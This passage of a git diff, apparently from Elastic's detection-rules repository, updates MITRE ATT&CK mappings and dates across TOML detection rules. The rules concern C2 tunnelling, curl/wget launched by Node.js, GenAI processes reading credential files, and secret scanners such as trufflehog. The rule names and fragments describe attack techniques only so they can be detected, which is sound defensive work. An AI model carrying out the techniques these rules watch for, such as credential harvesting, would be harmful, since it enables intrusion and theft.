..._suspicious_windows_server_update_svc.toml | 44 ++++- .../initial_access_url_cve_2025_33053.toml | 30 +++- ...explorer_suspicious_child_parent_args.toml | 34 +++- ..._access_webshell_screenconnect_server.toml | 26 ++- ...l_access_xsl_script_execution_via_com.toml | 41 ++++- .../windows/lateral_movement_cmd_service.toml | 18 ++- ...redential_access_kerberos_correlation.toml | 14 +- rules/windows/lateral_movement_dcom_hta.toml | 28 +++- .../windows/lateral_movement_dcom_mmc20.toml | 28 +++- ...t_dcom_shellwindow_shellbrowserwindow.toml | 23 ++- ...ateral_movement_evasion_rdp_shadowing.toml | 18 ++- ..._movement_execution_from_tsclient_mup.toml | 10 +- ...nt_execution_via_file_shares_sequence.toml | 10 +- .../lateral_movement_incoming_wmi.toml | 11 +- .../lateral_movement_rdp_sharprdp_target.toml | 28 +++- ...ovement_remote_file_copy_hidden_share.toml | 26 ++- ...ement_remote_service_installed_winlog.toml | 26 ++- .../lateral_movement_remote_services.toml | 21 ++- ...movement_unusual_dns_service_children.toml | 16 +- ...ement_unusual_dns_service_file_writes.toml | 15 +- ...l_movement_via_startup_folder_rdp_smb.toml | 18 ++- .../lateral_movement_via_wsus_update.toml | 10 +- .../persistence_appcertdlls_registry.toml | 24 +-- ...persistence_browser_extension_install.toml | 8 +- ...evasion_hidden_local_account_creation.toml | 23 ++- ...egistry_startup_shell_folder_modified.toml | 24 +-- ...sistence_group_modification_by_system.toml | 20 +-- .../persistence_ms_outlook_vba_template.toml | 8 +- ...ersistence_msi_installer_task_startup.toml | 17 +- ...persistence_msoffice_startup_registry.toml | 24 +-- ...ll_exch_mailbox_activesync_add_device.toml | 28 +++- .../persistence_powershell_profiles.toml | 24 +-- ...escalation_via_accessibility_features.toml | 30 ++-- .../persistence_registry_uncommon.toml | 31 +++- ...persistence_run_key_and_startup_broad.toml | 18 ++- ...ce_runtime_run_key_startup_susp_procs.toml | 71 ++++++++- ...istence_sdprop_exclusion_dsheuristics.toml | 18 ++- .../persistence_service_dll_unsigned.toml | 23 ++- .../persistence_services_registry.toml | 16 +- ...stence_suspicious_com_hijack_registry.toml | 41 +---- ...s_image_load_scheduled_task_ms_office.toml | 24 +-- ...nce_suspicious_scheduled_task_runtime.toml | 71 +++++++-- ...uspicious_user_mandatory_profile_file.toml | 12 +- ...ersistence_system_shells_via_services.toml | 18 ++- .../persistence_temp_scheduled_task.toml | 24 +-- .../persistence_time_provider_mod.toml | 29 +--- ..._account_added_to_privileged_group_ad.toml | 8 +- .../persistence_user_account_creation.toml | 10 +- .../persistence_via_application_shimming.toml | 24 +-- ...sistence_via_hidden_run_key_valuename.toml | 16 +- ...emetrycontroller_scheduledtask_hijack.toml | 29 +--- ...ia_update_orchestrator_service_hijack.toml | 21 ++- ...tence_via_wmi_stdregprov_run_services.toml | 30 +++- .../persistence_webshell_detection.toml | 19 ++- .../persistence_werfault_reflectdebugger.toml | 11 +- ...privilege_escalation_credroaming_ldap.toml | 8 +- ...ilege_escalation_disable_uac_registry.toml | 22 +-- ...alation_dmsa_creation_by_unusual_user.toml | 23 ++- ...e_escalation_dns_serverlevelplugindll.toml | 29 +++- ...ege_escalation_driver_newterm_imphash.toml | 18 ++- ...lege_escalation_expired_driver_loaded.toml | 16 +- ...lege_escalation_exploit_cve_202238028.toml | 16 +- ...calation_gpo_schtask_service_creation.toml | 18 ++- ...ege_escalation_group_policy_iniscript.toml | 18 ++- ...rivilege_escalation_installertakeover.toml | 24 ++- ...scalation_krbrelayup_service_creation.toml | 15 +- ...privilege_escalation_lsa_auth_package.toml | 24 +-- ...e_escalation_named_pipe_impersonation.toml | 8 +- ...ge_escalation_persistence_phantom_dll.toml | 29 +--- ...on_port_monitor_print_processor_abuse.toml | 28 +--- ...e_escalation_posh_token_impersonation.toml | 15 +- ...ation_printspooler_registry_copyfiles.toml | 19 ++- ..._printspooler_service_suspicious_file.toml | 13 +- ...printspooler_suspicious_file_deletion.toml | 21 ++- ..._escalation_reg_service_imagepath_mod.toml | 25 ++- ...calation_rogue_windir_environment_var.toml | 18 ++- ...lation_samaccountname_spoofing_attack.toml | 21 ++- ...on_service_control_spawned_script_int.toml | 28 +++- ...alation_suspicious_dnshostname_update.toml | 10 +- ...lege_escalation_uac_bypass_com_clipup.toml | 27 +--- ...ge_escalation_uac_bypass_com_ieinstal.toml | 26 ++- ...n_uac_bypass_com_interface_icmluautil.toml | 27 +--- ...alation_uac_bypass_diskcleanup_hijack.toml | 30 ++-- ...escalation_uac_bypass_dll_sideloading.toml | 30 +--- ...ge_escalation_uac_bypass_event_viewer.toml | 24 +-- ...ege_escalation_uac_bypass_mock_windir.toml | 22 +-- ...scalation_uac_bypass_winfw_mmc_hijack.toml | 22 +-- ...tion_unusual_parentchild_relationship.toml | 33 +++- ...n_unusual_svchost_childproc_childless.toml | 30 ++-- ...ilege_escalation_via_rogue_named_pipe.toml | 8 +- ...collection_archive_data_zip_imageload.toml | 8 +- ...ction_common_compressed_archived_file.toml | 20 ++- ...tion_files_staged_in_recycle_bin_root.toml | 23 ++- ...llection_microsoft_purview_dlp_signal.toml | 28 +++- .../collection_outlook_email_archive.toml | 12 +- .../collection_posh_compression.toml | 18 ++- ...ommand_and_control_bitsadmin_activity.toml | 26 +-- ...d_control_certutil_network_connection.toml | 16 +- ...llama_model_download_untrusted_source.toml | 15 +- ...access_entra_id_risk_detection_signal.toml | 12 +- ...ntial_access_iis_apppoolsa_pwd_appcmd.toml | 13 +- ...dential_access_win_private_key_access.toml | 18 ++- ...ense_evasion_cmd_copy_binary_contents.toml | 15 +- .../defense_evasion_dll_hijack.toml | 10 +- ...evasion_dotnet_clickonce_dfsvc_netcon.toml | 12 +- ...fense_evasion_download_susp_extension.toml | 26 ++- ...cution_via_visualstudio_prebuildevent.toml | 18 ++- .../defense_evasion_generic_deletion.toml | 18 ++- ...fense_evasion_injection_from_msoffice.toml | 41 +++-- ...ense_evasion_masquerading_windows_dll.toml | 23 +-- ...ion_masquerading_windows_system32_exe.toml | 16 +- ...soft_security_compliance_admin_signal.toml | 27 +++- ...fense_evasion_msdt_suspicious_diagcab.toml | 21 ++- ...ense_evasion_outlook_suspicious_child.toml | 21 ++- ..._obfuscation_proportion_special_chars.toml | 15 +- ...nse_evasion_service_disabled_registry.toml | 16 +- ...defense_evasion_service_path_registry.toml | 33 ++-- .../defense_evasion_services_exe_path.toml | 33 ++-- ...nse_evasion_unusual_process_path_wbem.toml | 8 +- .../defense_evasion_write_dac_access.toml | 18 ++- .../discovery_generic_account_groups.toml | 14 +- .../discovery_hosts_file_access.toml | 7 +- ...ry_kernel_module_enumeration_via_proc.toml | 8 +- ...ubectl_workload_and_cluster_discovery.toml | 12 +- .../discovery_linux_modprobe_enumeration.toml | 24 ++- .../discovery_linux_sysctl_enumeration.toml | 32 +++- .../discovery_net_share_discovery_winlog.toml | 24 ++- .../discovery_of_domain_groups.toml | 8 +- .../discovery_posh_generic.toml | 35 ++-- .../discovery_posh_password_policy.toml | 26 ++- ...ery_potential_memory_seeking_activity.toml | 15 +- ...ote_system_discovery_commands_windows.toml | 13 +- .../discovery_system_network_connections.toml | 8 +- .../discovery_system_service_discovery.toml | 13 +- .../discovery_system_time_discovery.toml | 8 +- .../discovery_win_network_connections.toml | 13 +- ..._windows_system_information_discovery.toml | 26 ++- ...ution_github_new_event_action_for_pat.toml | 39 ++++- ...n_github_new_repo_interaction_for_pat.toml | 21 ++- ..._github_new_repo_interaction_for_user.toml | 21 ++- .../execution_github_repo_created.toml | 21 ++- ...n_github_repo_interaction_from_new_ip.toml | 39 ++++- .../execution_linux_segfault.toml | 8 +- ...ution_settingcontent_ms_file_creation.toml | 28 +++- ...execution_unsigned_service_executable.toml | 28 +++- ...itial_access_aws_signin_token_created.toml | 23 ++- ..._access_github_new_ip_address_for_pat.toml | 23 ++- ..._access_github_new_user_agent_for_pat.toml | 23 ++- ...t_defender_threat_intelligence_signal.toml | 24 ++- ...s_microsoft_quarantine_hygiene_signal.toml | 12 +- ...cess_new_okta_authentication_behavior.toml | 13 +- ...cess_okta_admin_console_login_failure.toml | 11 +- .../lateral_movement_posh_winrm_activity.toml | 17 +- ...movement_unusual_process_sql_accounts.toml | 34 +++- .../lateral_movement_wmic_remote.toml | 15 +- ...e_aws_iam_login_profile_added_to_user.toml | 14 +- .../persistence_github_new_pat_for_user.toml | 23 ++- ...github_new_user_added_to_organization.toml | 10 +- ...e_iam_instance_request_to_iam_service.toml | 16 +- ...ce_web_server_potential_sql_injection.toml | 15 +- ...sistence_web_server_sus_file_creation.toml | 15 +- ..._escalation_sts_getsessiontoken_abuse.toml | 26 ++- 1174 files changed, 20817 insertions(+), 4993 deletions(-) diff --git a/rules/cross-platform/command_and_control_common_llm_endpoint.toml b/rules/cross-platform/command_and_control_common_llm_endpoint.toml index 8614a7cea40..b15f7f8f511 100644 --- a/rules/cross-platform/command_and_control_common_llm_endpoint.toml +++ b/rules/cross-platform/command_and_control_common_llm_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/10" +updated_date = "2026/03/24" [rule] @@ -150,16 +150,18 @@ network where host.os.type in ("macos", "windows") and dns.question.name != null [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" - +[[rule.threat.technique.subtechnique]] +id = "T1102.002" +name = "Bidirectional Communication" +reference = "https://attack.mitre.org/techniques/T1102/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - - diff --git a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml index 5ba4932123d..f8c152baafe 100644 --- a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml +++ b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,17 +123,22 @@ process.parent.name in ("node", "bun", "node.exe", "bun.exe") and ( [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" - - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml b/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml index b508ee3bf19..235c22f4eb0 100644 --- a/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml +++ b/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/19" integration = ["endpoint", "system"] maturity = "production" -updated_date = "2025/02/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,14 +89,23 @@ Google Drive is a widely-used cloud storage service that allows users to store a [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.003" +name = "One-Way Communication" +reference = "https://attack.mitre.org/techniques/T1102/003/" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml index 4ed6298ead7..ba94e8a181e 100644 --- a/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml +++ b/rules/cross-platform/command_and_control_pan_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/18" integration = ["endpoint", "panw"] maturity = "production" -updated_date = "2025/11/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -70,6 +70,11 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml index 0ca53756373..46c2d36826f 100644 --- a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml +++ b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["endpoint", "suricata"] maturity = "production" -updated_date = "2026/01/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -76,7 +76,30 @@ note = """## Triage and analysis [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1571" +name = "Non-Standard Port" +reference = "https://attack.mitre.org/techniques/T1571/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/command_and_control_tunnel_qemu.toml b/rules/cross-platform/command_and_control_tunnel_qemu.toml index 6a3c887e279..6441d002cd9 100644 --- a/rules/cross-platform/command_and_control_tunnel_qemu.toml +++ b/rules/cross-platform/command_and_control_tunnel_qemu.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -95,14 +95,23 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml index 70427bd61ba..ad9183c5d49 100644 --- a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml +++ b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -139,26 +139,54 @@ file where event.action in ("open", "creation", "modification") and event.outcom [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1005" name = "Data from Local System" reference = "https://attack.mitre.org/techniques/T1005/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/credential_access_gitleaks_execution.toml b/rules/cross-platform/credential_access_gitleaks_execution.toml index f4efcf94595..4ae8155c9ca 100644 --- a/rules/cross-platform/credential_access_gitleaks_execution.toml +++ b/rules/cross-platform/credential_access_gitleaks_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/28" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,6 +103,16 @@ id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" @@ -112,3 +122,21 @@ reference = "https://attack.mitre.org/techniques/T1555/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/cross-platform/credential_access_trufflehog_execution.toml b/rules/cross-platform/credential_access_trufflehog_execution.toml index b6faa0d1aee..334251a1f29 100644 --- a/rules/cross-platform/credential_access_trufflehog_execution.toml +++ b/rules/cross-platform/credential_access_trufflehog_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2025/11/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -105,6 +105,16 @@ id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" @@ -114,3 +124,16 @@ reference = "https://attack.mitre.org/techniques/T1555/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml b/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml index 84468fac2f7..28fd5a021e7 100644 --- a/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml +++ b/rules/cross-platform/defense_evasion_agent_spoofing_multiple_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,15 +73,31 @@ In network environments, agents are deployed on hosts to monitor and report acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.002" +name = "Transmitted Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/002/" +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml index 150a6573e2d..a1863190075 100644 --- a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml +++ b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,14 +86,18 @@ file where event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml b/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml index 2a258446202..75b91f559df 100644 --- a/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml +++ b/rules/cross-platform/defense_evasion_elastic_agent_service_terminated.toml @@ -2,7 +2,7 @@ creation_date = "2022/05/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1562/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml index a33eb01577e..2992c160598 100644 --- a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml +++ b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -81,22 +81,41 @@ ROT encoding, a simple letter substitution cipher, is often used to obfuscate Py [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.013" name = "Encrypted/Encoded File" reference = "https://attack.mitre.org/techniques/T1027/013/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml index 812702a98d9..cf95d5c68b5 100644 --- a/rules/cross-platform/defense_evasion_genai_config_modification.toml +++ b/rules/cross-platform/defense_evasion_genai_config_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,29 +104,39 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml index 20e0c1c6df0..77ad5e0a025 100644 --- a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml +++ b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "auditd_manager"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -140,19 +140,36 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1587" +name = "Develop Capabilities" +reference = "https://attack.mitre.org/techniques/T1587/" + +[[rule.threat.technique.subtechnique]] +id = "T1587.001" +name = "Malware" +reference = "https://attack.mitre.org/techniques/T1587/001/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml index 1f8053d9767..5a7e264fdc9 100644 --- a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml +++ b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/12/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -159,14 +159,49 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1560" +name = "Archive Collected Data" +reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1030" +name = "Data Transfer Size Limits" +reference = "https://attack.mitre.org/techniques/T1030/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git 